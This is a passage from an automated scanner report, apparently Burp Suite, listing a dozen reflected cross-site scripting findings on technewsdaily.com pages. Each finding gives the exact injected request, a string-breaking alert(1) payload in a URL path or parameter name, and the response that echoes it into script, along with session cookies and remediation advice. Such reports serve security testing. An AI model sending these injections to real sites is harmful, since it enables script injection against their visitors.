User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45229

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/social-media?584c4'-alert(1)-'ed2b184271d=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.165. http://www.technewsdaily.com/section/social-media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/social-media/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21db8'-alert(1)-'b8aa64b0900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section21db8'-alert(1)-'b8aa64b0900/social-media/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section21db8'-alert(1)-'b8aa64b0900/social-media/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.166. http://www.technewsdaily.com/section/social-media/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/social-media/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce66'-alert(1)-'5ea401b52b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/social-media/?8ce66'-alert(1)-'5ea401b52b=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45245

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/social-media/?8ce66'-alert(1)-'5ea401b52b=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.167. http://www.technewsdaily.com/section/software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/software

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cae9c'-alert(1)-'ff4a4a14a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sectioncae9c'-alert(1)-'ff4a4a14a1d/software HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sectioncae9c'-alert(1)-'ff4a4a14a1d/software",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.168. http://www.technewsdaily.com/section/software [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/software

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 694a5'-alert(1)-'a545607c0a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/software?694a5'-alert(1)-'a545607c0a1=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/software?694a5'-alert(1)-'a545607c0a1=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.169. http://www.technewsdaily.com/section/software/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/software/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 722e7'-alert(1)-'0ef6bed6e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section722e7'-alert(1)-'0ef6bed6e78/software/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section722e7'-alert(1)-'0ef6bed6e78/software/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.170. http://www.technewsdaily.com/section/software/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/software/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f267'-alert(1)-'016a32755f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/software/?1f267'-alert(1)-'016a32755f9=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45444

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/software/?1f267'-alert(1)-'016a32755f9=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.171. http://www.technewsdaily.com/section/tech-one [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/tech-one

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f0d'-alert(1)-'a512e84ab16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sectionb6f0d'-alert(1)-'a512e84ab16/tech-one HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sectionb6f0d'-alert(1)-'a512e84ab16/tech-one",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.172. http://www.technewsdaily.com/section/tech-one [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/tech-one

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddea'-alert(1)-'37b5c24f6db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/tech-one?fddea'-alert(1)-'37b5c24f6db=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/tech-one?fddea'-alert(1)-'37b5c24f6db=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.173. http://www.technewsdaily.com/section/tech-one/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/tech-one/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6efaf'-alert(1)-'59ad93c06af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section6efaf'-alert(1)-'59ad93c06af/tech-one/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40432

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section6efaf'-alert(1)-'59ad93c06af/tech-one/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.174. http://www.technewsdaily.com/section/tech-one/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /section/tech-one/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e3e'-alert(1)-'bba7e1fda95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /section/tech-one/?b2e3e'-alert(1)-'bba7e1fda95=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/section/tech-one/?b2e3e'-alert(1)-'bba7e1fda95=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.175. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /skylifter-flying-saucer-replacing-blimps-helicopters-1381/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c562e'-alert(1)-'a1749b0473b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skylifter-flying-saucer-replacing-blimps-helicopters-1381c562e'-alert(1)-'a1749b0473b/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40512

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
t/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381c562e'-alert(1)-'a1749b0473b/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.176. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /skylifter-flying-saucer-replacing-blimps-helicopters-1381/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ac3'-alert(1)-'059b41dd681 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skylifter-flying-saucer-replacing-blimps-helicopters-1381/?58ac3'-alert(1)-'059b41dd681=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65724

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
